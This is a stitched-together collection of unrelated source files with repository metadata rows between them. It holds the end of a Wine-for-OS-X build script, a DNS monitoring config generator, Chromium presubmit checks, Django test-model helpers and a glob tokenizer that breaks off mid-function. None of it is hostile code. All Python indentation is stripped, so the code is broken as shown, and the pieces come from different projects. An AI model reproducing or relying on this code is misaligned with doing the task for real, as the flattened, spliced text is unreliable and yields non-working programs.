'--disable-gtk-doc-html',
'--disable-gtk-doc-pdf',
'--disable-silent-rules',
'--disable-static',
)
make_install(archive = name)
def build_nettle(name = 'nettle-2.7.1'):
message(name)
if binCheck(name): return
extract(name, '.tar.gz')
configure(
'--disable-documentation',
)
make_install(archive = name)
# note: gnutls will fail depending on nettle version.
def build_gnutls(name = 'gnutls'):
build_libtasn1()
build_nettle()
message(name)
if binCheck(name): return
reposcopy(name)
git_checkout(branch = 'gnutls_3_1_x')
autotools.make(
'autoreconf',
)
configure(
'--disable-doc',
'--disable-gtk-doc',
'--disable-gtk-doc-html',
'--disable-gtk-doc-pdf',
'--disable-nls',
'--disable-silent-rules',
'--disable-static',
'--enable-threads=posix',
)
make_install(archive = name)
# GSM --------------------------------------------------------------------------
def build_gsm(name = 'gsm-1.0.13'):
message(name)
extract(name, '.tar.gz', 'gsm-1.0-pl13')
vsh(
"""
make {install_name} \
CC='{cc} -ansi -pedantic' \
CCFLAGS='-c {cflags} -DNeedFunctionPrototypes=1' \
LDFLAGS='{ldflags}' \
LIBGSM='{install_name}' \
AR='{cc}' \
ARFLAGS='-dynamiclib -fPIC -v -arch i386 -install_name $(LIBGSM) -compatibility_version 1 -current_version 1.0.3 -o' \
RANLIB=':' \
RMFLAGS='-f'
install -m 0644 inc/gsm.h {prefix}/include
""".format(
prefix = PREFIX,
cc = os.getenv('CC'),
cflags = os.getenv('CFLAGS'),
ldflags = os.getenv('LDFLAGS'),
install_name = os.path.join(LIBDIR, 'libgsm.dylib'),
))
# LIBFFI -----------------------------------------------------------------------
def build_libffi(name = 'libffi'):
message(name)
if binCheck(name): return
reposcopy(name)
git_checkout()
configure()
make_install(archive = name)
# LIBGPHOTO2 -------------------------------------------------------------------
def build_libexif(name = 'libexif-0.6.21'):
message(name)
if binCheck(name): return
extract(name, '.tar.bz2')
configure(
'--disable-docs',
'--disable-nls',
'--with-doc-dir=' + os.path.join(DOCDIR, name),
)
make_install(archive = name)
def build_popt(name = 'popt-1.14'):
message(name)
if binCheck(name): return
extract(name, '.tar.gz')
configure(
'--disable-nls',
)
make_install(archive = name)
def build_gd(name = 'libgd-2.1.0'):
message(name)
if binCheck(name): return
extract(name, '.tar.xz')
configure(
'--without-fontconfig',
'--without-x',
'--with-freetype=' + PREFIX,
'--with-jpeg=' + PREFIX,
'--with-png=' + PREFIX,
'--with-tiff=' + PREFIX,
'--with-zlib=' + PREFIX,
)
make_install(archive = name)
def build_libgphoto2(name = 'libgphoto2'):
build_libexif()
build_popt()
build_gd()
message(name)
if binCheck(name): return
reposcopy(name)
autoreconf(
'-s',
)
configure(
'--disable-nls',
'--with-drivers=all',
'CFLAGS="{cflags} -D_DARWIN_C_SOURCE"'.format(cflags = os.getenv('CFLAGS')),
)
make_install(archive = name)
# LIBJPEG-TURBO ----------------------------------------------------------------
def build_libjpeg_turbo(name = 'libjpeg-turbo'):
message(name)
if binCheck(name): return
reposcopy(name)
git_checkout('1.3.x')
vsh(
"""
sed -i '' 's|$(datadir)/doc|&/libjpeg-turbo|' Makefile.am
""")
autoreconf()
configure(
'--with-jpeg8',
)
make_install(archive = name)
# LIBPNG -----------------------------------------------------------------------
def build_libpng(name = 'libpng'):
message(name)
if binCheck(name): return
reposcopy(name)
git_checkout('libpng16')
autogen()
configure()
make_install(archive = name)
# LIBUSB -----------------------------------------------------------------------
def build_libusb(name = 'libusb'):
message(name)
if binCheck(name): return
reposcopy(name)
vsh(
"""
sed -i '' '/^.\\/configure/,$d' autogen.sh
""")
autogen()
configure()
make_install(archive = name)
build_libusb_compat()
def build_libusb_compat(name = 'libusb-compat-0.1'):
message(name)
if binCheck(name): return
reposcopy(name)
vsh(
"""
sed -i '' '/^.\\/configure/,$d' autogen.sh
""")
autogen()
configure()
make_install(archive = name)
# LIBTIFF ----------------------------------------------------------------------
def build_libtiff(name = 'libtiff'):
message(name)
if binCheck(name): return
reposcopy(name)
git_checkout('branch-3-9')
configure(
'--disable-jbig',
'--disable-silent-rules',
'--without-x',
)
make_install(archive = name)
# LITTLE-CMS -------------------------------------------------------------------
def build_lcms(name = 'Little-CMS'):
message(name)
if binCheck(name): return
reposcopy(name)
configure()
make_install(archive = name)
# MPG123 -----------------------------------------------------------------------
# dependencies: SDL
#
def build_mpg123(name = 'mpg123'):
message(name)
if binCheck(name): return
reposcopy(name)
autoreconf()
configure(
'--with-default-audio=coreaudio',
'--with-optimization=0',
)
make_install(archive = name)
# READLINE ---------------------------------------------------------------------
def build_readline(name = 'readline'):
message(name)
if binCheck(name): return
reposcopy(name)
git_checkout()
patch(os.path.join(PROJECT_ROOT, 'osx-wine-patch/readline.patch'))
configure(
'--enable-multibyte',
'--with-curses',
)
make_install(archive = name)
# SANE-BACKENDS ----------------------------------------------------------------
# dependencies: jpeg, libusb-compat, net-snmp, tiff, zlib
#
def build_net_snmp(name = 'net-snmp'):
message(name)
if binCheck(name): return
reposcopy(name)
git_checkout()
configure(
'--with-defaults',
)
make_install(archive=name)
def build_sane(name = 'sane-backends'):
build_net_snmp()
message(name)
if binCheck(name): return
reposcopy(name)
git_checkout()
configure(
'--disable-latex',
'--disable-maintainer-mode',
'--disable-silent-rules',
'--disable-translations',
'--enable-libusb_1_0',
'--enable-local-backends',
'--with-docdir=' + os.path.join(DOCDIR, name),
'--without-v4l',
)
make_install(archive = name)
# SDL --------------------------------------------------------------------------
def build_SDL(name = 'SDL'):
message(name)
if binCheck(name): return
reposcopy(name)
hg_update('SDL-1.2')
autogen()
configure()
make_install(archive = name)
# WINE -------------------------------------------------------------------------
def build_wine(name = 'wine'):
message(name)
if not binCheck(name):
reposcopy(name)
# git_checkout('wine-1.7.4')
git_checkout()
for f in os.listdir(PATCHROOT):
if f.startswith('wine_'):
patch(os.path.join(PATCHROOT, f))
configure(
'--without-capi',
'--without-oss',
'--without-v4l',
'--with-x',
'--x-inc=/opt/X11/include',
'--x-lib=/opt/X11/lib',
'CC=' + CLANG,
'CXX=' + CLANGXX,
'CFLAGS="-arch i386 %s"' % os.getenv('CFLAGS'),
'CXXFLAGS="-arch i386 %s"' % os.getenv('CXXFLAGS'),
prefix = W_PREFIX,
)
make_install(archive = name)
# note: add rpath
vsh("""install_name_tool -add_rpath /opt/X11/lib {W_BINDIR}/wine""".format(**globals()))
# note: rename executable
src = os.path.join(W_BINDIR, 'wine')
dst = os.path.join(W_LIBEXECDIR, 'wine')
os.rename(src, dst)
# note: install wine loader
src = os.path.join(PROJECT_ROOT, 'wineloader.py.in')
dst = os.path.join(W_BINDIR, 'wine')
with open(src, 'r') as i:
str = i.read()
str = str.replace('___CAPTION___', 'Nihonshu - Customized Wine binary for OS X (Ja)')
with open(dst, 'w') as o:
o.write(str)
os.chmod(dst, 0755)
installDoc(
name,
'ANNOUNCE',
'AUTHORS',
'COPYING.LIB',
'LICENSE',
'README',
)
# WINETRICKS / CABEXTRACT ------------------------------------------------------
def build_cabextract(name = 'cabextract-1.4'):
message(name)
extract(name, '.tar.gz')
configure(prefix = W_PREFIX)
make_install()
installDoc(
name,
'AUTHORS',
'COPYING',
'README',
)
def build_winetricks(name = 'winetricks'):
build_cabextract()
message(name)
reposcopy(name)
git_checkout("edit")
vsh("""make install PREFIX={W_PREFIX}""".format(**globals()))
### RENAME EXECUTABLE ###
os.rename(os.path.join(W_BINDIR, 'winetricks'),
os.path.join(W_LIBEXECDIR, 'winetricks'))
### INSTALL WINETRICKS LOADER ###
installFile(os.path.join(PROJECT_ROOT, 'winetricksloader.py'),
os.path.join(W_BINDIR, 'winetricks'),
0755)
installDoc(
name,
'src/COPYING',
)
# XZ ---------------------------------------------------------------------------
def build_xz(name = 'xz'):
message(name)
if binCheck(name): return
reposcopy(name)
git_checkout()
autogen()
configure(
'--disable-nls',
'--disable-silent-rules',
)
make_install(archive = name)
# ZLIB -------------------------------------------------------------------------
def build_zlib(name = 'zlib'):
message(name)
if binCheck(name): return
reposcopy(name)
git_checkout()
vsh("""./configure --prefix={PREFIX}""".format(**globals()))
make_install(archive = name)
#-------------------------------------------------------------------------------
def create_distfile():
def create_distfile_clean():
rm(os.path.join(W_DATADIR, 'applications'))
for root, dirs, files in os.walk(W_LIBDIR):
if root == os.path.join(W_LIBDIR, 'wine'): continue
if root == W_LIBDIR:
for d in dirs:
d = os.path.join(root, d)
if d.endswith((
'gettext',
'gio',
'glib-2.0',
'libffi-3.0.13',
'pkgconfig',
)):
if os.path.exists(d):
rm(d)
for f in files:
f = os.path.join(root, f)
if f.endswith((
'.a',
'.la',
'.alias',
)):
if os.path.exists(f):
rm(f)
def create_distfile_core(distname):
src = W_PREFIX
dst = os.path.join(os.path.dirname(W_PREFIX), distname + '.exe')
if os.path.exists(dst): rm(dst)
p7zip('a', '-sfx', '-mx=9', dst, src)
def create_distfile_rebuild_shared_libdir():
rm(PREFIX)
makedirs(PREFIX)
os.symlink('../lib', LIBDIR)
#---------------------------------------------------------------------------
create_app = CreateApp()
os.chdir(os.path.dirname(INSTALL_ROOT))
create_distfile_clean()
create_distfile_rebuild_shared_libdir()
install_core_resources()
create_app.nihonshu()
### no-plugin ##
create_distfile_core('wine_nihonshu_no-plugin')
### plugin ##
install_plugin()
create_app.sevenzip()
create_distfile_core('wine_nihonshu')
#-------------------------------------------------------------------------------
class CreateApp():
def __init__(self):
self.srcroot = os.path.join(PROJECT_ROOT, 'app')
self.approot = os.path.join(W_PREFIX, 'app')
makedirs(self.approot)
def install_app(self, name, src):
message(name)
vsh(
"""
osacompile -x -o {dst} {src}
""".format(
dst = os.path.join(self.approot, name),
src = os.path.join(self.srcroot, src),
))
def install_icon(self, name, src, suffix = 'Contents/Resources/droplet.icns'):
installFile(os.path.join(self.srcroot, src),
os.path.join(self.approot, name, suffix))
def install_plist(self, name, src, suffix = 'Contents/Info.plist'):
installFile(os.path.join(self.srcroot, src),
os.path.join(self.approot, name, suffix))
def nihonshu(self, name = 'Nihonshu.app'):
self.install_app( name, 'nihonshu.applescript')
self.install_plist(name, 'nihonshu.info.plist.in')
# todo
os.remove(os.path.join(self.approot, name, 'Contents/Resources/droplet.icns'))
def sevenzip(self, name = '7zFM.app'):
self.install_app( name, '7z.applescript')
self.install_icon( name, '7z.icns')
self.install_plist(name, '7z.info.plist.in')
#-------------------------------------------------------------------------------
if __name__ == '__main__':
os.system('declare')
build_zlib()
build_gsm()
build_xz()
build_gettext()
build_readline()
build_gmp()
build_libffi()
build_glib()
build_libusb()
build_gnutls()
build_libpng()
build_freetype()
build_libjpeg_turbo()
build_libtiff()
build_lcms()
build_libgphoto2()
build_sane()
build_SDL()
build_mpg123()
build_wine()
build_winetricks()
create_distfile()
os.system('echo done; afplay /System/Library/Sounds/Hero.aiff')
| gpl-3.0 | 7,017,750,207,364,745,000 | 26.878754 | 122 | 0.513865 | false |
savoirfairelinux/quebec-monitoring | scripts/dns.py | 1 | 2091 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
DNS = {
# Cogeco Cable (Trois-rivieres)
'cogeco.ca': ['205.151.69.200','205.151.68.200'],
# Videotron.CA
'videotron.ca': ['205.151.222.250', '205.151.222.251'],
# Colbanet
'colba.net': ['216.252.64.75', '216.252.64.76'],
}
template_host = (
"""
define host {
use generic-host
host_name %(host)s
address %(host)s
alias %(host)s
check_command check_dummy!0!OK
}
""")
template_service = (
"""
define service {
use generic-service
host_name %(host)s
check_command check_dig_service!%(ip)s!www.gouv.qc.ca
display_name %(host)s (%(ip)s)
service_description %(ip)s
servicegroups dns
labels order_%(order)d
}
""")
business_rule = (
"""
define host {
use generic-host
host_name dns
alias dns
check_command check_dummy!0!OK
}
define service {
use template_bprule
host_name dns
service_description dns
display_name DNS
notes Principaux serveurs DNS.
check_command bp_rule!%(all_dns)s
business_rule_output_template $(x)$
servicegroups main
icon_image fa-gears
}
""")
def main():
all_dns = []
order = 1
for host, ips in DNS.iteritems():
print template_host % {'host': host}
for ip in ips:
print template_service % {'host': host, 'ip': ip, 'order': order}
all_dns.append('%(host)s,%(ip)s' % {'host': host, 'ip': ip})
order += 1
print business_rule % {'all_dns': '&'.join(all_dns)}
if __name__ == '__main__':
main()
| agpl-3.0 | -6,103,445,619,368,963,000 | 27.256757 | 77 | 0.432329 | false |
paul99/clank | PRESUBMIT.py | 1 | 13362 | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Top-level presubmit script for Chromium.
See http://dev.chromium.org/developers/how-tos/depottools/presubmit-scripts
for more details about the presubmit API built into gcl.
"""
import re
_EXCLUDED_PATHS = (
r"^breakpad[\\\/].*",
r"^native_client_sdk[\\\/].*",
r"^net[\\\/]tools[\\\/]spdyshark[\\\/].*",
r"^skia[\\\/].*",
r"^v8[\\\/].*",
r".*MakeFile$",
)
_TEST_ONLY_WARNING = (
'You might be calling functions intended only for testing from\n'
'production code. It is OK to ignore this warning if you know what\n'
'you are doing, as the heuristics used to detect the situation are\n'
'not perfect. The commit queue will not block on this warning.\n'
'Email [email protected] if you have questions.')
def _CheckNoInterfacesInBase(input_api, output_api):
"""Checks to make sure no files in libbase.a have |@interface|."""
pattern = input_api.re.compile(r'^\s*@interface', input_api.re.MULTILINE)
files = []
for f in input_api.AffectedSourceFiles(input_api.FilterSourceFile):
if (f.LocalPath().startswith('base/') and
not f.LocalPath().endswith('_unittest.mm')):
contents = input_api.ReadFile(f)
if pattern.search(contents):
files.append(f)
if len(files):
return [ output_api.PresubmitError(
'Objective-C interfaces or categories are forbidden in libbase. ' +
'See http://groups.google.com/a/chromium.org/group/chromium-dev/' +
'browse_thread/thread/efb28c10435987fd',
files) ]
return []
def _CheckNoProductionCodeUsingTestOnlyFunctions(input_api, output_api):
"""Attempts to prevent use of functions intended only for testing in
non-testing code. For now this is just a best-effort implementation
that ignores header files and may have some false positives. A
better implementation would probably need a proper C++ parser.
"""
# We only scan .cc files and the like, as the declaration of
# for-testing functions in header files are hard to distinguish from
# calls to such functions without a proper C++ parser.
source_extensions = r'\.(cc|cpp|cxx|mm)$'
file_inclusion_pattern = r'.+%s' % source_extensions
file_exclusion_patterns = (
r'.*[/\\](test_|mock_).+%s' % source_extensions,
r'.+_test_(support|base)%s' % source_extensions,
r'.+_(api|browser|perf|unit|ui)?test%s' % source_extensions,
r'.+profile_sync_service_harness%s' % source_extensions,
)
path_exclusion_patterns = (
r'.*[/\\](test|tool(s)?)[/\\].*',
# At request of folks maintaining this folder.
r'chrome[/\\]browser[/\\]automation[/\\].*',
)
base_function_pattern = r'ForTest(ing)?|for_test(ing)?'
inclusion_pattern = input_api.re.compile(r'(%s)\s*\(' % base_function_pattern)
exclusion_pattern = input_api.re.compile(
r'::[A-Za-z0-9_]+(%s)|(%s)[^;]+\{' % (
base_function_pattern, base_function_pattern))
def FilterFile(affected_file):
black_list = (file_exclusion_patterns + path_exclusion_patterns +
_EXCLUDED_PATHS + input_api.DEFAULT_BLACK_LIST)
return input_api.FilterSourceFile(
affected_file,
white_list=(file_inclusion_pattern, ),
black_list=black_list)
problems = []
for f in input_api.AffectedSourceFiles(FilterFile):
local_path = f.LocalPath()
lines = input_api.ReadFile(f).splitlines()
line_number = 0
for line in lines:
if (inclusion_pattern.search(line) and
not exclusion_pattern.search(line)):
problems.append(
'%s:%d\n %s' % (local_path, line_number, line.strip()))
line_number += 1
if problems:
if not input_api.is_committing:
return [output_api.PresubmitPromptWarning(_TEST_ONLY_WARNING, problems)]
else:
# We don't warn on commit, to avoid stopping commits going through CQ.
return [output_api.PresubmitNotifyResult(_TEST_ONLY_WARNING, problems)]
else:
return []
def _CheckNoIOStreamInHeaders(input_api, output_api):
"""Checks to make sure no .h files include <iostream>."""
files = []
pattern = input_api.re.compile(r'^#include\s*<iostream>',
input_api.re.MULTILINE)
for f in input_api.AffectedSourceFiles(input_api.FilterSourceFile):
if not f.LocalPath().endswith('.h'):
continue
contents = input_api.ReadFile(f)
if pattern.search(contents):
files.append(f)
if len(files):
return [ output_api.PresubmitError(
'Do not #include <iostream> in header files, since it inserts static ' +
'initialization into every file including the header. Instead, ' +
'#include <ostream>. See http://crbug.com/94794',
files) ]
return []
def _CheckNoNewWStrings(input_api, output_api):
"""Checks to make sure we don't introduce use of wstrings."""
problems = []
for f in input_api.AffectedFiles():
if (not f.LocalPath().endswith(('.cc', '.h')) or
f.LocalPath().endswith('test.cc')):
continue
for line_num, line in f.ChangedContents():
if 'wstring' in line:
problems.append(' %s:%d' % (f.LocalPath(), line_num))
if not problems:
return []
return [output_api.PresubmitPromptWarning('New code should not use wstrings.'
' If you are calling an API that accepts a wstring, fix the API.\n' +
'\n'.join(problems))]
def _CheckNoDEPSGIT(input_api, output_api):
"""Make sure .DEPS.git is never modified manually."""
if any(f.LocalPath().endswith('.DEPS.git') for f in
input_api.AffectedFiles()):
return [output_api.PresubmitError(
'Never commit changes to .DEPS.git. This file is maintained by an\n'
'automated system based on what\'s in DEPS and your changes will be\n'
'overwritten.\n'
'See http://code.google.com/p/chromium/wiki/UsingNewGit#Rolling_DEPS\n'
'for more information')]
return []
def _CheckNoFRIEND_TEST(input_api, output_api):
"""Make sure that gtest's FRIEND_TEST() macro is not used, the
FRIEND_TEST_ALL_PREFIXES() macro from base/gtest_prod_util.h should be used
instead since that allows for FLAKY_, FAILS_ and DISABLED_ prefixes."""
problems = []
file_filter = lambda f: f.LocalPath().endswith(('.cc', '.h'))
for f in input_api.AffectedFiles(file_filter=file_filter):
for line_num, line in f.ChangedContents():
if 'FRIEND_TEST(' in line:
problems.append(' %s:%d' % (f.LocalPath(), line_num))
if not problems:
return []
return [output_api.PresubmitPromptWarning('Chromium code should not use '
'gtest\'s FRIEND_TEST() macro. Include base/gtest_prod_util.h and use '
'FRIEND_TEST_ALL_PREFIXES() instead.\n' + '\n'.join(problems))]
def _CheckNoNewOldCallback(input_api, output_api):
"""Checks to make sure we don't introduce new uses of old callbacks."""
def HasOldCallbackKeywords(line):
"""Returns True if a line of text contains keywords that indicate the use
of the old callback system.
"""
return ('NewRunnableMethod' in line or
'NewCallback' in line or
input_api.re.search(r'\bCallback\d<', line) or
input_api.re.search(r'\bpublic Task\b', line) or
'public CancelableTask' in line)
problems = []
file_filter = lambda f: f.LocalPath().endswith(('.cc', '.h'))
for f in input_api.AffectedFiles(file_filter=file_filter):
if not any(HasOldCallbackKeywords(line) for line in f.NewContents()):
continue
for line_num, line in f.ChangedContents():
if HasOldCallbackKeywords(line):
problems.append(' %s:%d' % (f.LocalPath(), line_num))
if not problems:
return []
return [output_api.PresubmitPromptWarning('The old callback system is '
'deprecated. If possible, use base::Bind and base::Callback instead.\n' +
'\n'.join(problems))]
def _CommonChecks(input_api, output_api):
"""Checks common to both upload and commit."""
results = []
results.extend(input_api.canned_checks.PanProjectChecks(
input_api, output_api, excluded_paths=_EXCLUDED_PATHS))
results.extend(_CheckNoInterfacesInBase(input_api, output_api))
results.extend(_CheckAuthorizedAuthor(input_api, output_api))
results.extend(
_CheckNoProductionCodeUsingTestOnlyFunctions(input_api, output_api))
results.extend(_CheckNoIOStreamInHeaders(input_api, output_api))
results.extend(_CheckNoNewWStrings(input_api, output_api))
results.extend(_CheckNoDEPSGIT(input_api, output_api))
results.extend(_CheckNoFRIEND_TEST(input_api, output_api))
results.extend(_CheckNoNewOldCallback(input_api, output_api))
return results
def _CheckSubversionConfig(input_api, output_api):
"""Verifies the subversion config file is correctly setup.
Checks that autoprops are enabled, returns an error otherwise.
"""
join = input_api.os_path.join
if input_api.platform == 'win32':
appdata = input_api.environ.get('APPDATA', '')
if not appdata:
return [output_api.PresubmitError('%APPDATA% is not configured.')]
path = join(appdata, 'Subversion', 'config')
else:
home = input_api.environ.get('HOME', '')
if not home:
return [output_api.PresubmitError('$HOME is not configured.')]
path = join(home, '.subversion', 'config')
error_msg = (
'Please look at http://dev.chromium.org/developers/coding-style to\n'
'configure your subversion configuration file. This enables automatic\n'
'properties to simplify the project maintenance.\n'
'Pro-tip: just download and install\n'
'http://src.chromium.org/viewvc/chrome/trunk/tools/build/slave/config\n')
try:
lines = open(path, 'r').read().splitlines()
# Make sure auto-props is enabled and check for 2 Chromium standard
# auto-prop.
if (not '*.cc = svn:eol-style=LF' in lines or
not '*.pdf = svn:mime-type=application/pdf' in lines or
not 'enable-auto-props = yes' in lines):
return [
output_api.PresubmitNotifyResult(
'It looks like you have not configured your subversion config '
'file or it is not up-to-date.\n' + error_msg)
]
except (OSError, IOError):
return [
output_api.PresubmitNotifyResult(
'Can\'t find your subversion config file.\n' + error_msg)
]
return []
def _CheckAuthorizedAuthor(input_api, output_api):
"""For non-googler/chromites committers, verify the author's email address is
in AUTHORS.
"""
# TODO(maruel): Add it to input_api?
import fnmatch
author = input_api.change.author_email
if not author:
input_api.logging.info('No author, skipping AUTHOR check')
return []
authors_path = input_api.os_path.join(
input_api.PresubmitLocalPath(), 'AUTHORS')
valid_authors = (
input_api.re.match(r'[^#]+\s+\<(.+?)\>\s*$', line)
for line in open(authors_path))
valid_authors = [item.group(1).lower() for item in valid_authors if item]
if input_api.verbose:
print 'Valid authors are %s' % ', '.join(valid_authors)
if not any(fnmatch.fnmatch(author.lower(), valid) for valid in valid_authors):
return [output_api.PresubmitPromptWarning(
('%s is not in AUTHORS file. If you are a new contributor, please visit'
'\n'
'http://www.chromium.org/developers/contributing-code and read the '
'"Legal" section\n'
'If you are a chromite, verify the contributor signed the CLA.') %
author)]
return []
def CheckChangeOnUpload(input_api, output_api):
results = []
results.extend(_CommonChecks(input_api, output_api))
return results
def CheckChangeOnCommit(input_api, output_api):
results = []
results.extend(_CommonChecks(input_api, output_api))
# TODO(thestig) temporarily disabled, doesn't work in third_party/
#results.extend(input_api.canned_checks.CheckSvnModifiedDirectories(
# input_api, output_api, sources))
# Make sure the tree is 'open'.
# TODO(tedbo): Re-enable tree open/close and trybot checks when we have
# buildbots and trybots.
# results.extend(input_api.canned_checks.CheckTreeIsOpen(
# input_api,
# output_api,
# json_url='http://chromium-status.appspot.com/current?format=json'))
# results.extend(input_api.canned_checks.CheckRietveldTryJobExecution(input_api,
# output_api, 'http://codereview.chromium.org',
# ('win_rel', 'linux_rel', 'mac_rel'), '[email protected]'))
results.extend(input_api.canned_checks.CheckChangeHasBugField(
input_api, output_api))
results.extend(input_api.canned_checks.CheckChangeHasTestField(
input_api, output_api))
results.extend(input_api.canned_checks.CheckChangeHasDescription(
input_api, output_api))
#Branch doesn't push to SVN, no need for this check
#results.extend(_CheckSubversionConfig(input_api, output_api))
return results
def GetPreferredTrySlaves(project, change):
only_objc_files = all(
f.LocalPath().endswith(('.mm', '.m')) for f in change.AffectedFiles())
if only_objc_files:
return ['mac_rel']
preferred = ['win_rel', 'linux_rel', 'mac_rel']
aura_re = '_aura[^/]*[.][^/]*'
if any(re.search(aura_re, f.LocalPath()) for f in change.AffectedFiles()):
preferred.append('linux_chromeos_aura:compile')
return preferred
| bsd-3-clause | 8,264,440,543,859,224,000 | 37.396552 | 82 | 0.66966 | false |
unt-libraries/catalog-api | django/sierra/utils/test_helpers/orm.py | 1 | 5271 | """
Contains test helpers for managing ORM test models and such.
"""
import os
from collections import OrderedDict
from django.db import models
from django.core import management
from django.db import connections, OperationalError
from django.conf import settings
class AppModelsEnvironment(object):
"""
Class for creating and managing a set of model classes for testing.
Create a model class using `make`. That class is added to
self.models, an OrderedDict, and can be accessed there. Example:
my ModelSet object is `modelset` and one of my classes is MyModel.
I can access it via modelset.models['MyModel'].
Destroy a model class, remove it from this ModelSet, and remove it
from the Django apps registry using `delete`.
Destroy all model classes on this ModelSet using `clear`.
Sync the database using `migrate`. Migrations are made and the
database is synced via admin commands (makemigrations, migrate),
just depending on the current state of the models.
Use `reset` to roll back and clear migrations for the entire app.
Use `close` to completely roll back changes made by creating models
this way--it calls `reset` and then `clear`.
This is also a context manager object, so, when used in a `with`
block, it calls `close` for you afterward.
"""
def __init__(self, modulename, modulepath, modeltype=models.Model,
using='default'):
self.models = OrderedDict()
self.modulename = modulename
self.modulepath = modulepath
self.modeltype = modeltype
self.connection = connections[using]
def __enter__(self):
self.reset()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
def _get_migration_file_info(self):
"""
Get the filenames of all migration files for the app the models
on this object belong to, along with the absolute path to the
migration directory. Returns a tuple: (migfnames, migdirpath)
"""
def is_migration(filename):
if not filename.startswith('__'):
if filename.endswith('.py') or filename.endswith('.pyc'):
return True
return False
moddirpath = os.path.join(*self.modulepath.split('.'))
migdirpath = os.path.join(settings.PROJECT_DIR, moddirpath,
'migrations')
migfnames = [fn for fn in os.listdir(migdirpath) if is_migration(fn)]
return (migfnames, migdirpath)
def make(self, name, fields, modeltype=None, meta_options=None):
"""
Return a new test model class. Pass in the test model's name
via `name` and a dict of fields to create via `fields`. The
model will be a base class of self.modeltype by default, or you
may pass in a custom type via `modeltype`. Any special meta
options you need can be passed as a dict via `meta_options`.
"""
params = fields
modeltype = modeltype or self.modeltype
params['__module__'] = self.modulepath
if meta_options:
params['Meta'] = type('Meta', (object,), meta_options)
new_model = type(name, (modeltype,), params)
self.models[name] = new_model
return new_model
def delete(self, name):
"""
Destroy one of the registered test models you created, by name.
"""
model = self.models[name]
apps = model._meta.apps
model_name = model._meta.model_name
try:
del(apps.all_models[self.modulename][model_name])
except KeyError:
pass
del(model)
apps.clear_cache()
del(self.models[name])
def clear(self):
"""
Destroy all registered test models created via this factory.
"""
for name in self.models.keys():
self.delete(name)
def migrate(self):
"""
Create and run migrations to sync the DB with the current model
state.
"""
management.call_command('makemigrations', self.modulename, verbosity=0,
interactive=False)
management.call_command('migrate', self.modulename, verbosity=0,
interactive=False)
def reset(self):
"""
Reset migration states for the app this object represents.
Resets migration history and deletes all migration files.
"""
try:
management.call_command('migrate', self.modulename, 'zero',
verbosity=0, interactive=False)
except OperationalError:
# If DB tables from a previous run have been deleted, the
# above attempt to migrate will error out. In that case,
# just back the migration history up to zero.
management.call_command('migrate', self.modulename, 'zero',
verbosity=0, interactive=False, fake=True)
migfnames, migdirpath = self._get_migration_file_info()
for migfname in migfnames:
os.remove(os.path.join(migdirpath, migfname))
def close(self):
self.reset()
self.clear()
| bsd-3-clause | 6,047,544,646,794,864,000 | 35.351724 | 79 | 0.616771 | false |
dpanth3r/biggraphite | biggraphite/glob_utils.py | 1 | 15872 | #!/usr/bin/env python
# Copyright 2016 Criteo
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Globbing utility module."""
from enum import Enum
import itertools
import re
# http://graphite.readthedocs.io/en/latest/render_api.html#paths-and-wildcards
_GRAPHITE_GLOB_RE = re.compile(r"^[^*?{}\[\]]+$")
def _is_graphite_glob(metric_component):
"""Return whether a metric component is a Graphite glob."""
return _GRAPHITE_GLOB_RE.match(metric_component) is None
def _is_valid_glob(glob):
"""Check whether a glob pattern is valid.
It does so by making sure it has no dots (path separator) inside groups,
and that the grouping braces are not mismatched. This helps doing useless
(or worse, wrong) work on queries.
Args:
glob: Graphite glob pattern.
Returns:
True if the glob is valid.
"""
depth = 0
for c in glob:
if c == '{':
depth += 1
elif c == '}':
depth -= 1
if depth < 0:
# Mismatched braces
return False
elif c == '.':
if depth > 0:
# Component separator in the middle of a group
return False
# We should have exited all groups at the end
return depth == 0
class TokenType(Enum):
"""Represents atomic types used to tokenize Graphite globbing patterns."""
PATH_SEPARATOR = 0
LITERAL = 1
WILD_CHAR = 2
WILD_SEQUENCE = 3
WILD_PATH = 4
CHAR_SELECT_BEGIN = 5
CHAR_SELECT_NEGATED_BEGIN = 6
CHAR_SELECT_RANGE_DASH = 7
CHAR_SELECT_END = 8
EXPR_SELECT_BEGIN = 9
EXPR_SELECT_SEPARATOR = 10
EXPR_SELECT_END = 11
def tokenize(glob):
"""Convert a glob expression to a stream of tokens.
Tokens have the form (type: TokenType, data: String).
Args:
glob: Graphite glob pattern.
Returns:
Iterator on a token stream.
"""
SPECIAL_CHARS = '.?*[-]{,}'
is_escaped = False
is_char_select = False
tmp = ""
token = None
i = -1
while i+1 < len(glob):
i += 1
c = glob[i]
# Literal handling
if is_escaped:
tmp += c
is_escaped = False
continue
elif c == '\\':
is_escaped = True
continue
elif c not in SPECIAL_CHARS or (c == '-' and not is_char_select):
if token and token != TokenType.LITERAL:
yield token, None
token, tmp = TokenType.LITERAL, ""
token = TokenType.LITERAL
tmp += c
continue
elif token:
yield token, tmp
token, tmp = None, ""
# Special chars handling
if c == '.':
yield TokenType.PATH_SEPARATOR, ""
elif c == '?':
yield TokenType.WILD_CHAR, ""
elif c == '*':
# Look-ahead for wild path (globstar)
if i+1 < len(glob) and glob[i+1] == '*':
i += 1
yield TokenType.WILD_PATH, ""
else:
yield TokenType.WILD_SEQUENCE, ""
elif c == '[':
is_char_select = True
# Look-ahead for negated selector (not in)
if i+1 < len(glob) and glob[i+1] == '!':
i += 1
yield TokenType.CHAR_SELECT_NEGATED_BEGIN, ""
else:
yield TokenType.CHAR_SELECT_BEGIN, ""
elif c == '-':
yield TokenType.CHAR_SELECT_RANGE_DASH, ""
elif c == ']':
is_char_select = False
yield TokenType.CHAR_SELECT_END, ""
elif c == '{':
yield TokenType.EXPR_SELECT_BEGIN, ""
elif c == ',':
yield TokenType.EXPR_SELECT_SEPARATOR, ""
elif c == '}':
yield TokenType.EXPR_SELECT_END, ""
else:
raise Exception("Unexpected character '%s'" % c)
# Do not forget trailing token, if any
if token:
yield token, tmp
def _glob_to_regex(glob):
